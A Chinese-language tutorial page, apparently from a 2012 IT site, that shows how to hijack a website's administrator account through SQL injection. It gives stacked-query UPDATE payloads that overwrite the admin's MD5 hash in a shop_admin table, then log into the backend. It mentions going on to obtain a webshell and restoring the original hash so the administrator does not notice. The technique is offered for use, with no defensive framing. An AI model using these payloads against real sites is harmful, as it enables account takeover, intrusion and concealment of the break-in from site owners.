IT教程 | 加入收藏 | 简体 | 繁体
渗透技术:网络技术渗透技术
当前位置: 首页 > 网络安全 > 渗透技术

另类更改管理员密码的小技巧

2012-02-22来源:[www.121ask.com]热度:0℃ 【字体:

教你怎么样利用注射来更改管理员的密码:

注入点已经找到:http://xxx.com/book.asp?id=1996
我刚已经用NB检测过了。可以看到,存在表段 shop_admin。
可是密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c
我们来尝试欺骗。可以看出,欺骗是没戏滴。
那咋办?难道要跑密码?那得浪费多少时间和内存啊?
下面我来介绍一种新方法:注射。注射的语句如下:
;update shop_admin set password='新MD5加密密码' where password='d4716077c2ba075c'--
比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二

位密码
这里用明小子的工具就能转换了。wmmhacker - f8dc763194f29433
;update shop_admin set password='f8dc763194f29433' where password='d4716077c2ba075c'--
我们来测试。看见了,页面没有返回错误,表示成功了。
现在我们对shop_admin表段下的密码做重新解猜。
[adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433
大家对比一下,已经改变了。现在我们可以登陆了。
进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。
接着,别忘了把管理员密码还原。不然他会发现滴!
;update shop_admin set password='d4716077c2ba075c' where password='f8dc763194f29433'--

以上IT文章《另类更改管理员密码的小技巧》由名客技术网[www.121ask.com]提供阅读!
名客技术网是一个免费为广大IT技术人员提供IT教程,绿色软件,asp/php/jsp/java/net等实例视频教程,CMS教程,破解软件下载以及学习相关源码、知识的IT网站。
名客技术网如果无意之中侵犯了您的版权,请来电告知,本站将在3个工作日内删除 QQ:175352796
Copyright 2011-2017 Powered by 121ASK.COM, All Rights Reserved.
备案号:鄂ICP备11013833号-3